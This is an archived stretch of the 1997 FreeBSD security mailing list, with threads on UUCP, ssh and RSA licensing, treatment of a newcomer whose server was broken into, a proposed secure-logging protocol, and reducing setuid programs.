jdn@qiv.com (Jay D. Nelson) Date: Wed, 30 Jul 1997 12:55:47 +0930 (CST) Cc: msmith@atrad.adelaide.edu.au, adam@homeport.org, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Jay D. Nelson stands accused of saying: > Your choir is singing to my preacher. I've got no problem making UUCP > optional. I would install it, though it would be totally overlooked by > most new comers. Which is probably a good thing. Agree. > I've had a few clients that wanted to do the SMTP thing on demand. > Thankfully, after explaining what is involved, I haven't had to to that > yet. Newer sendmails make it _moderately_ painless. I do quite a lot of work for another ISP that uses it very heavily (I think they have about a thousand dialup push-SMTP customers), but IMHO it's a lot more work to set up, and the running cost for the customer is higher in low load cases. > -- Jay -- ]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Tue Jul 29 20:32:37 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA03805 for security-outgoing; Tue, 29 Jul 1997 20:32:37 -0700 (PDT) Received: from fly.HiWAAY.net (root@fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA03797 for ; Tue, 29 Jul 1997 20:32:34 -0700 (PDT) Received: from nexgen.hiwaay.net by fly.HiWAAY.net; (8.8.6/1.1.8.2/21Sep95-1003PM) id WAA31800; Tue, 29 Jul 1997 22:31:41 -0500 (CDT) Received: from nexgen (localhost [127.0.0.1]) by nexgen.hiwaay.net (8.8.6/8.8.4) with ESMTP id WAA09906 for ; Tue, 29 Jul 1997 22:01:58 -0500 (CDT) Message-Id: <199707300301.WAA09906@nexgen.hiwaay.net> X-Mailer: exmh version 2.0zeta 7/24/97 To: freebsd-security@FreeBSD.ORG From: dkelly@hiwaay.net Subject: Commercial ssh and ssl (was Re: securelevel...) In-reply-to: Message from Vincent Poy of "Tue, 29 Jul 1997 16:00:38 PDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 29 Jul 1997 22:01:58 -0500 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy wrote: > > On Wed, 30 Jul 1997 sthaug@nethelp.no wrote: > > =)[cc list trimmed] > =) > =)> I was considering installing ssh but there is only one problem. > =)> I use Win95 from my own side at times for various reasons as well as > =)> the other remote admins. So a ssh client does cost money. We're > =)> volunteers and are not getting paid in any shape or form. > =) > =)The ssh client for Windows is $99. Educational sites are eligible for a > =)50% discount. Or you could run the FreeBSD version - for free. > > We're not a Educational site and are not getting paid by GaiaNet. > We voluntarily help admin the machines remotely. I know the FreeBSD > version is free but I am not always accessing the machines from the same > physical location. Is the FreeBSD ssh really free? >From /usr/ports/security/ssh/Makefile: # Don't use IDEA. IDEA can be freely used for non-commercial use. However, # commercial use may require a licence in a number of countries and @echo You must set variable USA_RESIDENT to YES if you are a USA @echo resident or NO otherwise. @echo If you are a USA resident you have to get the RSAREF2 @echo library \(RSA Inc. holds a patent on RSA and public key @echo cypto in general - using RSA implementations other thann @echo RSAREF will violate the US patent law\) @echo and extract it to ${WRKSRC}. Would someone care to correct me if I'm wrong, but don't the above terms prevent GaiaNet (who presumably charges for services) from using ssh at all without purchasing a license for RSA and/or IDEA? Looked into using ssh and SSLeay (in Apache) at work and concluded that if I'm being paid, its commercial, and licenses are required. And its even more commercial if my employer is being paid by a customer (US Gov) to implement. Same for the TIS-FWTK. Am I applying a stricter interpretation of the non-commercial terms than appropriate? Its a shame really, because if the choice boils down to Apache-SSL for $995 on FreeBSD vs. Netscape at $1295 on BSDI, SGI, or Solaris, Netscape will win. If it was up to The Boss, a Netscape or Microsoft server on NT would be the only consideration. I forgot, when does the relavent RSA patent expire? Maybe we can wait until then. :-) -- David Kelly N4HHE, dkelly@hiwaay.net ===================================================================== The human mind ordinarily operates at only ten percent of its capacity -- the rest is overhead for the operating system. From owner-freebsd-security Wed Jul 30 05:09:57 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA26858 for security-outgoing; Wed, 30 Jul 1997 05:09:57 -0700 (PDT) Received: from logic.it (mod16.logic.it [195.120.151.32]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id FAA26851 for ; Wed, 30 Jul 1997 05:09:47 -0700 (PDT) Received: (qmail 534 invoked by uid 1000); 30 Jul 1997 12:04:33 -0000 Date: Wed, 30 Jul 1997 14:04:33 +0200 (MET DST) From: Marco Molteni X-Sender: molter@dumbwinter.ecomotor.it To: Vincent Poy cc: security@FreeBSD.ORG, "\[Mario1-\]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Ok guys, my 2 cents opinion ;-) There's a thing really I can't understand in all this thread. Nobody said: "Vince, we're sorry about what happened to you. Probably you did something stupid, but _everybody_ has to learn his lesson the hard way. Here you are a a checklist of books, programs and ideas to follow to improve the security of your site." No, everybody started to flame at him! Why? Because he choosed as his subject line: "security hole in FreeBSD" instead of "I'm a sucker please you security wizards help me" ? Do you think one can be a newcomer as an administrator, but _has_ to know everything about security before he starts to work? Come on! Now a note about myself. I'm not a security expert, but security is surely a field I like much. I'm subscribed to this list to learn. In the previous examples I'm not suggesting that Vince is a sucker or similar, I'm just replying to some arguments appeared in the postings. Marco Molteni Computer Science student at the Universita' di Milano, Italy. "The time has come", the Walrus said, "to talk of many things". From owner-freebsd-security Wed Jul 30 05:30:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA27664 for security-outgoing; Wed, 30 Jul 1997 05:30:35 -0700 (PDT) Received: from anugpo.anu.edu.au (anugpo.anu.edu.au [150.203.2.6]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id FAA27659 for ; Wed, 30 Jul 1997 05:30:31 -0700 (PDT) Received: from bohm.anu.edu.au (root@bohm.anu.edu.au [150.203.21.88]) by anugpo.anu.edu.au (8.8.5/8.8.5) with SMTP id WAA07750; Wed, 30 Jul 1997 22:30:27 +1000 (EST) Received: from s3080696 by bohm.anu.edu.au (SMI-8.6/SMI-SVR4) id WAA23230; Wed, 30 Jul 1997 22:30:12 +1000 Message-Id: <3.0.32.19970730223202.0070ef8c@student.anu.edu.au> X-Sender: s3080696@student.anu.edu.au X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 30 Jul 1997 22:32:18 +1000 To: Adam Shostack , jdn@qiv.com (Jay D. Nelson) From: James Seng Subject: Re: security hole in FreeBSD Cc: adam@homeport.org, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk At 09:06 PM 7/29/97 -0400, Adam Shostack wrote: > Let me be clear; I don't have anything against UUCP users, but >most people don't need it turned on. Since its parts of it are >setuid, (and thus potential security holes) I think its a reasonable >to suggest that it ship either not setuid or as an install option. I have not heard of any request for the use UUCP from my users nor is my UUCP binaries been used in the last few years...I think the time when lease line is expensive, when university work with 9,600bps (wow) connection and when UUCP rules the earth is over...we have to let it go and look forward. *8) I have nothing against UUCP of cos but it is always nice if we can reduce the base distribution size by letting some of the less often used stuff away. *cheers* -James Seng From owner-freebsd-security Wed Jul 30 06:04:10 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA29009 for security-outgoing; Wed, 30 Jul 1997 06:04:10 -0700 (PDT) Received: from sinbin.demos.su (sinbin.demos.su [194.87.0.31]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id GAA29003 for ; Wed, 30 Jul 1997 06:04:02 -0700 (PDT) Received: by sinbin.demos.su id QAA13164; (8.6.12/D) Wed, 30 Jul 1997 16:59:22 +0400 From: bag@sinbin.demos.su (Alex G. Bulushev) Message-Id: <199707301259.QAA13164@sinbin.demos.su> Subject: Re: security hole in FreeBSD In-Reply-To: <3.0.32.19970730223202.0070ef8c@student.anu.edu.au> from "James Seng" at "Jul 30, 97 10:32:18 pm" X-ELM-OSV: (Our standard violations) no-mime=1; no-hdr-encoding=1 To: jseng@pobox.org.sg (James Seng) Date: Wed, 30 Jul 1997 16:59:22 +0400 (MSD) Cc: adam@homeport.org, jdn@qiv.com, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > At 09:06 PM 7/29/97 -0400, Adam Shostack wrote: > > Let me be clear; I don't have anything against UUCP users, but > >most people don't need it turned on. Since its parts of it are > >setuid, (and thus potential security holes) I think its a reasonable > >to suggest that it ship either not setuid or as an install option. > > I have not heard of any request for the use UUCP from my users nor is my > UUCP binaries been used in the last few years...I think the time when lease > line is expensive, when university work with 9,600bps (wow) connection and > when UUCP rules the earth is over...we have to let it go and look forward. *8) > > I have nothing against UUCP of cos but it is always nice if we can reduce > the base distribution size by letting some of the less often used stuff away. this is not right, uucp very popular in exSU, more then 30% users read mail via uucp and this is not due to 9600 :) some users run uucp over ip ... big number of fbsd pc's working as uucp hosts sometimes without ip connections ... Alex. > > *cheers* > > -James Seng > From owner-freebsd-security Wed Jul 30 06:46:03 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA01269 for security-outgoing; Wed, 30 Jul 1997 06:46:03 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA01264 for ; Wed, 30 Jul 1997 06:46:00 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id GAA13867; Wed, 30 Jul 1997 06:45:49 -0700 (PDT) Date: Wed, 30 Jul 1997 06:45:49 -0700 (PDT) From: Vincent Poy To: Marco Molteni cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Marco Molteni wrote: =)Ok guys, =)my 2 cents opinion ;-) I'll add my 2 cents too since I've been awake for 72 hours anyways. =)There's a thing really I can't understand in all this thread. =)Nobody said: =)"Vince, we're sorry about what happened to you. Probably you did something =)stupid, but _everybody_ has to learn his lesson the hard way. =)Here you are a a checklist of books, programs and ideas to follow to =)improve the security of your site." That much I'll agree with since you won't know pain until it hits you. =)No, everybody started to flame at him! Why? Because he choosed as his =)subject line: "security hole in FreeBSD" instead of "I'm a sucker =)please you security wizards help me" ? =) =)Do you think one can be a newcomer as an administrator, but _has_ to know =)everything about security before he starts to work? Come on! =) =)Now a note about myself. I'm not a security expert, but security is =)surely a field I like much. I'm subscribed to this list to learn. =)In the previous examples I'm not suggesting that Vince is a sucker or =)similar, I'm just replying to some arguments appeared in the postings. I know. I mean Nate and Jordan has been in this thing for atleast twice as long as I have. I'm only 23 years old now. Jordan, Nate and the rest of the FreeBSD core team have been designing Unix from the start from what Jordan told me back in the FreeBSD 1.0 Gamma days. One will never know everything and will need to learn from others. Unless everyone is Albert Einstein here. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Wed Jul 30 06:52:50 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA01716 for security-outgoing; Wed, 30 Jul 1997 06:52:50 -0700 (PDT) Received: from shift-f1.com (shift-f1.com [205.160.29.37]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA01705 for ; Wed, 30 Jul 1997 06:52:46 -0700 (PDT) Received: (from shashi@localhost) by shift-f1.com (8.8.5/8.8.5) id JAA25877; Wed, 30 Jul 1997 09:50:56 -0500 (EST) From: Shashi Joshi Message-Id: <199707301450.JAA25877@shift-f1.com> Subject: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: from Marco Molteni at "Jul 30, 97 02:04:33 pm" To: molter@logic.it (Marco Molteni) Date: Wed, 30 Jul 1997 09:50:56 -0500 (EST) Cc: vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com X-Mailer: ELM [version 2.4ME+ PL31 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk As Marco Molteni said -> > There's a thing really I can't understand in all this thread. > Nobody said: > "Vince, we're sorry about what happened to you. Probably you did something > stupid, but _everybody_ has to learn his lesson the hard way. > Here you are a a checklist of books, programs and ideas to follow to > improve the security of your site." > > No, everybody started to flame at him! Why? Because he choosed as his > subject line: "security hole in FreeBSD" instead of "I'm a sucker > please you security wizards help me" ? > > Do you think one can be a newcomer as an administrator, but _has_ to know > everything about security before he starts to work? Come on! Exactly my thoughts. So, do we get a checklist or reference list from the gurus? I am also a bit new to the sys admin duties. I have taken the time to read the FreeBSD book that came with the CD (which doesn't help much in the security area), read a UNIX sysadmin book (Nemeth, Snyder etc the Red Book) but it too has its limitations. We don't have external user logins, so the risks are much less, but I would always like to learn because soon we will be "out there". Another netter mentioned about FreeBSD should ship with some documentation, scripts that tell us (about the system files and directories) what are the files associated with "feature" A or "service" B (e.g. uucp), which files need to be setuid for what functionality. Here is an example. (I know you gurus will laugh, but it was my 3rd day only). Realizing that sbin dirs are for sysadmin related files, I made the */sbin as -r-xr-x--- and group being wheel or bin as appropriate. Now, after a few weeks!! I realised that I am not able to send out any mail. I had been receiving mail like anything, my elm session also didn't complain when I sent out email. Finally I checked the logs and found nothing, not a trace of a mail sent out. So I checked to see `which sendmail` and it was /usr/sbin/sendmail So I had to give r-x permissions to it to the world. Now why would sendmail be in sbin when it is not purely a sysadmin tool only? My point? Having a document or a checklist would be real helpful to newbies and can serve as a quick reference for the gurus. regards, -- Shashi Joshi From owner-freebsd-security Wed Jul 30 07:04:32 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA02572 for security-outgoing; Wed, 30 Jul 1997 07:04:32 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA02559 for ; Wed, 30 Jul 1997 07:04:28 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id KAA08273; Wed, 30 Jul 1997 10:04:15 -0400 (EDT) Date: Wed, 30 Jul 1997 10:04:14 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Adam Shostack cc: security@FreeBSD.ORG, rgrimes@GndRsh.aac.dev.com, dholland@eecs.harvard.edu Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: <199707300111.VAA16730@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Adam Shostack wrote: > Robert Watson wrote: > | Is there any concensus on the use of DNSsec in the network community, as > | it has not yet been made widely available (or at least, it is available, > | but not largely used.) The key namespace here could be used however one > | desired, nor necessarily in a DNS-style way. The entity-name, whatever > | that is, simply suggests which key/algorithm should be used, a server > | could be configured to pull that information from DNSsec, or from an > | internal key-file (or both.) > > I don't trust the DNS right now. I also don't see a need to > put keys there for local use. Use ssh to distribute them. :) DNSsec requires one root key to authenticate against any outside key located in DNSsec. SSH requires a complete list of all keys in a manually-managed keyfile. SSH is wonderful, and I use it lots, but it really isn't scalable. DNSsec is designed to be globally scalable. I wouldn't be surprised if SSH starts using DNSsec to pick up and store SSH keys in the near future. :) Also, to use secure logging (hopefully a feature that will be available on all platforms eventually), I don't want to require the configuration and use of SSH. Right now SSH is more available than DNSsec, but if the Internet Infrastructure is to get any more secure, we really need DNSsec in place very, very soon. Manual keying is never desirable (except for the root key, or an organizational root key), although it should be supported. My hopes were to support a general keying architecture, hopefully with a key management daemon eventually being written by someone. Key names would be supported in a DNS-like form, and permit .local. or such to indicate a local key, which would be extracted from a local key-file, possibly distributed with SSH. I'd rather not design the key support to not use DNSsec. :) > | An ACK message has already been stated as desirable -- would a simple > | signature over the last packet (or header + signature) using the shared > | secret, entity public key, or whatever, back on the TCP connection > | suffice? Maybe something lighter-weight? > > I'm leaning to acks being simpler than involving the last > packet, and towords them involving just a sequence number: > > ACK log://somehost.evil.net:234566, HMAC Sequence numbers have their upsides and downsides. One downside is that I will easily generate a million log messages a week (some use syslog for HTTP logging) -- if I have 100 machines doing that, a 32 bit number has restrictions. The URL format only accepts 16-bit values in that field, I think, although I don't know if that's an artifact of port limits, and can be any numeric value. Sequence numbers on individual log messages might be nice, as then one can eliminate duplicates in a cleanup operation, as well as detect missing log entries. ACK's should definitely be signed in some way, possibly over: Signature of packet responded to | ACK packet sans signature BTW, is there any interest in starting up a seperate mailing list on this issue? It doesn't pertain specifically to FreeBSD, although I plan to do any experimentation and implementing on this platform, myself. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Wed Jul 30 07:07:13 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA02814 for security-outgoing; Wed, 30 Jul 1997 07:07:13 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA02809 for ; Wed, 30 Jul 1997 07:07:10 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id KAA08284; Wed, 30 Jul 1997 10:06:57 -0400 (EDT) Date: Wed, 30 Jul 1997 10:06:57 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: dkelly@hiwaay.net cc: freebsd-security@FreeBSD.ORG Subject: Re: Commercial ssh and ssl (was Re: securelevel...) In-Reply-To: <199707300301.WAA09906@nexgen.hiwaay.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997 dkelly@hiwaay.net wrote: > I forgot, when does the relavent RSA patent expire? Maybe we can wait until > then. :-) September, 2000. I wouldn't wait on this one. :) Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Wed Jul 30 07:09:01 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA03031 for security-outgoing; Wed, 30 Jul 1997 07:09:01 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA03026 for ; Wed, 30 Jul 1997 07:08:59 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id HAA13960; Wed, 30 Jul 1997 07:08:04 -0700 (PDT) Date: Wed, 30 Jul 1997 07:08:04 -0700 (PDT) From: Vincent Poy To: Shashi Joshi cc: Marco Molteni , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <199707301450.JAA25877@shift-f1.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Shashi Joshi wrote: =)As Marco Molteni said -> =) =)> Do you think one can be a newcomer as an administrator, but _has_ to know =)> everything about security before he starts to work? Come on! =) =) =)Exactly my thoughts. So, do we get a checklist or reference list from the =)gurus? =) =)I am also a bit new to the sys admin duties. I have =)taken the time to read the FreeBSD book that came with the CD (which =)doesn't help much in the security area), read a UNIX sysadmin book (Nemeth, =)Snyder etc the Red Book) but it too has its limitations. I wish I had access to the FreeBSD book since I've been looking for one at different places in the Bay Area and they didn't have anything but the CD itself. =)We don't have external user logins, so the risks are much less, but I would =)always like to learn because soon we will be "out there". I'm sure that in the future, people will find all sorts of ways to break in to systems not via user logins but via ports or daemons. =)Another netter mentioned about FreeBSD should ship with some documentation, =)scripts that tell us (about the system files and directories) what are the =)files associated with "feature" A or "service" B (e.g. uucp), which files =)need to be setuid for what functionality. =) =)Here is an example. (I know you gurus will laugh, but it was my 3rd day =)only). =) =)Realizing that sbin dirs are for sysadmin related files, I made the */sbin =)as -r-xr-x--- and group being wheel or bin as appropriate. =)Now, after a few weeks!! I realised that I am not able to send out any =)mail. I had been receiving mail like anything, my elm session also didn't =)complain when I sent out email. Finally I checked the logs and found =)nothing, not a trace of a mail sent out. So I checked to see `which =)sendmail` and it was /usr/sbin/sendmail =)So I had to give r-x permissions to it to the world. =) =)Now why would sendmail be in sbin when it is not purely a sysadmin tool =)only? Good question but sendmail is a daemon that only root or the system should run I guess. =)My point? Having a document or a checklist would be real helpful to newbies =)and can serve as a quick reference for the gurus. Good point indeed. I had been thinking about this hack, would it have been possible for the hacker to have ran perl.003 and then snatched the master.passwd file and then cracked it? Also, about the crc check, isn't the /etc/daily script supposed to compare files and do a security check already? Another point I want to make is that for one reason or another, 2.1.7.1R and previous versions were more strict on the password than 2.1R and 2.2.2R is. I have verified this with freshly installed boxes. On a 2.1.7.1R and older box, if you tried to su and the root password was 1234567890, you had to enter it as 1234567890 or else it won't work and say Sorry! On 2.1R, 2.2.2R and -CURRENT, I can enter 1234567890, 1234567891, 1234567892, etc. and it will still give me root access. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Wed Jul 30 07:18:27 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA03509 for security-outgoing; Wed, 30 Jul 1997 07:18:27 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA03503 for ; Wed, 30 Jul 1997 07:18:25 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id KAA08313 for ; Wed, 30 Jul 1997 10:18:16 -0400 (EDT) Date: Wed, 30 Jul 1997 10:18:16 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: security@freebsd.org Subject: Secure FreeBSD distribution issues Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Some discussion recently (much thanks to Vinnie :) has centered on removing common security problems and unnecessary features from FreeBSD on a particular variation of installation. This would make some features optional, removing a number of unnecessary SUID programs. Additionally, turning off rcommands has been suggested, setting a default secure-level and determining which files should have immutable/append/etc flags set on them, as well as a set of guidelines for removing any other features that admins would be interested in. Additionally, some other issues come to mind: 1. A list of setuid programs, and why each is justified; also which can be removed in various situations. 2. A kernel flag added that disables the operation of any setuid functionality (by default not listed in the kernel config file, and by default allowing setuid.) This would break much local mail delivery, password changing in non-distributed environments, uucp, and a number of other nifty things, but would be good in a distributed environment involving NFS mounts, Kerberos or NIS, and use of secure-levels. It would reimpose the rigorous "privleges can only ever be lossed, never gained". 3. Work with the gid/uid issues on binding ports < 1024, allowing programs such as web servers to bind as non-root, lowering the number of situations where root access is required for a daemon. By default, at least intially, this would be off, or uid required to be 0 for all of these ports. A secure distribution might have this turned on, and a modified daemon-set? Other ideas that might be useful in such an environment? The goal, I think, is not to provide a completely iron-clad environment, just one where fewer priveleges are required to perform operations that have previously required more privelege than desirable, and a reduced set of setuid utilities that might be unecessary. As a possible first step, the disabling of clearly developmental setuid programs, such as suidperl, with instructions on reenabling it in the previously mentioned document (probably just chmod u+s /usr/bin/sperl), etc. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Wed Jul 30 07:31:38 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA04139 for security-outgoing; Wed, 30 Jul 1997 07:31:38 -0700 (PDT) Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA04134 for ; Wed, 30 Jul 1997 07:31:36 -0700 (PDT) From: proff@suburbia.net Received: from suburbia.net (suburbia.net [198.142.2.24]) by pdx1.world.net (8.7.5/8.7.3) with SMTP id HAA01523 for ; Wed, 30 Jul 1997 07:35:52 -0700 (PDT) Received: (qmail 9190 invoked by uid 110); 30 Jul 1997 14:30:14 -0000 Message-ID: <19970730143014.9189.qmail@suburbia.net> Subject: Einstein In-Reply-To: from Vincent Poy at "Jul 30, 97 06:45:49 am" To: vince@mail.MCESTATE.COM (Vincent Poy) Date: Thu, 31 Jul 1997 00:30:14 +1000 (EST) Cc: security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > what Jordan told me back in the FreeBSD 1.0 Gamma days. One will never > know everything and will need to learn from others. Unless everyone is > Albert Einstein here. > > > Cheers, > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Einstein never held such an opinion. -- Prof. Julian Assange |Little Fly, Thy Summer's Play My thoughtless hand Has |Brush'd away. Am not I A fly like thee? Or are thou A proff@iq.org |man like me? For I dance, And drink, and sing, Till proff@gnu.ai.mit.edu |some blind hand Shall brush my wing. -Blake From owner-freebsd-security Wed Jul 30 07:49:37 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA05553 for security-outgoing; Wed, 30 Jul 1997 07:49:37 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA05536 for ; Wed, 30 Jul 1997 07:49:32 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id IAA04613; Wed, 30 Jul 1997 08:49:12 -0600 (MDT) Date: Wed, 30 Jul 1997 08:49:12 -0600 (MDT) Message-Id: <199707301449.IAA04613@rocky.mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Marco Molteni Cc: Vincent Poy , security@freebsd.org, "\[Mario1-\]" Subject: Re: security hole in FreeBSD In-Reply-To: References: X-Mailer: VM 6.29 under 19.15 XEmacs Lucid Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > There's a thing really I can't understand in all this thread. > Nobody said: > "Vince, we're sorry about what happened to you. Probably you did something > stupid, but _everybody_ has to learn his lesson the hard way. > Here you are a a checklist of books, programs and ideas to follow to > improve the security of your site." > > No, everybody started to flame at him! Why? Because he choosed as his > subject line: "security hole in FreeBSD" instead of "I'm a sucker > please you security wizards help me" ? Ahh, but you assume that we haven't ever seen Vinny before. Unfortunately, his behavior is 'typical', in that he wants us to do all his research and work for him, rather than him spending the time to do his own work. He also shows a complete lack of interest in finding out solutions to his own problems. I've dealt with him too many times over the last 2 years to have anything but pity on any company he works for, since he will require hand-holding and doesn't do anything on his own. Nate From owner-freebsd-security Wed Jul 30 07:55:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA05995 for security-outgoing; Wed, 30 Jul 1997 07:55:07 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA05988 for ; Wed, 30 Jul 1997 07:55:05 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id HAA14096; Wed, 30 